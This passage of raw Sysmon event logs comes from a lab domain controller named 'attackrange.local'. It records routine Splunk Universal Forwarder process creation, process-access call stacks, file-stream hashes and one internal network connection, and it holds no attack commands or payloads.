Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000009587Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:04.749{266CAFBE-6570-6064-4501-00000000AE01}6540C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{266CAFBE-64ED-6064-D500-00000000AE01}5648C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000009586Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:04.107{266CAFBE-656F-6064-4401-00000000AE01}68566852C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{266CAFBE-64ED-6064-D500-00000000AE01}5648C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000009585Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:03.998{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B7380D65808E1A0A6895D23D3B7DCE3E,SHA256=A7E4F7F67E86BC32C91C469B814BED92EEDA94CA2879A0705AB3B58CB603D401,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000009608Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:03.510{266CAFBE-64F5-6064-0301-00000000AE01}6500C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-892.attackrange.local53635-false10.0.1.12-8000- 23542300x80000000000000009607Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:05.013{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4EB0189E6D0B8A5FF1395D2E283C3E8C,SHA256=FC7B67EC2CCF814A3B814F56FB748939B29F1AA4E4B891C0C0D7C9E41DD8D3EC,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000009620Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:06.527{266CAFBE-6572-6064-4601-00000000AE01}37767032C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{266CAFBE-64ED-6064-D500-00000000AE01}5648C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009619Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:06.371{266CAFBE-64EE-6064-D900-00000000AE01}53082340C:\Windows\system32\conhost.exe{266CAFBE-6572-6064-4601-00000000AE01}3776C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009618Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:06.371{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009617Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:06.371{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009616Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:06.371{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009615Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:06.371{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009614Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:06.371{266CAFBE-6469-6064-0500-00000000AE01}6242352C:\Windows\system32\csrss.exe{266CAFBE-6572-6064-4601-00000000AE01}3776C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000009613Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:06.371{266CAFBE-64ED-6064-D500-00000000AE01}56481476C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{266CAFBE-6572-6064-4601-00000000AE01}3776C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000009612Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:06.372{266CAFBE-6572-6064-4601-00000000AE01}3776C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{266CAFBE-64ED-6064-D500-00000000AE01}5648C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000009611Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:06.090{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=729BDB7702CA4ACE9AB9B3A9CB61A7B3,SHA256=4C39C4908131D0480204D9A3FD85365D2608C81BACDF9EC014DAE692212990E6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000009610Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:06.012{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\ApplicationMD5=54D4FB4CECE767138E0CC9729BC1D798,SHA256=4A3FBF81CC56644DE7BEED1BE6E221E6B8D88178E487E13EAD9B774F26C068CF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000009609Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:06.012{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\ApplicationMD5=CAFF4F24058526D0ECCDAA2B14FFAA99,SHA256=DD47BECA9E71476BC5CF6EA64B480435E90F020A3421397EB8E0FB7F8D1EFECA,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000009638Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:07.838{266CAFBE-64EE-6064-D900-00000000AE01}53082340C:\Windows\system32\conhost.exe{266CAFBE-6573-6064-4801-00000000AE01}6024C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009637Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:07.838{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009636Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:07.838{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009635Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:07.838{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009634Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:07.838{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009633Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:07.838{266CAFBE-6469-6064-0500-00000000AE01}6241132C:\Windows\system32\csrss.exe{266CAFBE-6573-6064-4801-00000000AE01}6024C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000009632Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:07.838{266CAFBE-64ED-6064-D500-00000000AE01}56481476C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{266CAFBE-6573-6064-4801-00000000AE01}6024C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000009631Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:07.839{266CAFBE-6573-6064-4801-00000000AE01}6024C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{266CAFBE-64ED-6064-D500-00000000AE01}5648C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000009630Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:07.198{266CAFBE-6573-6064-4701-00000000AE01}18285744C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{266CAFBE-64ED-6064-D500-00000000AE01}5648C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000009629Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:07.105{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2DA3F59C0F2942E1250F8C49A6AC3205,SHA256=411EC198E7FA57253E7925F5BC37185F23307E1F38E6C3AB0B7C490D94F103EE,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000009628Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:07.042{266CAFBE-64EE-6064-D900-00000000AE01}53082340C:\Windows\system32\conhost.exe{266CAFBE-6573-6064-4701-00000000AE01}1828C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009627Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:07.042{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009626Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:07.042{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009625Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:07.042{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009624Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 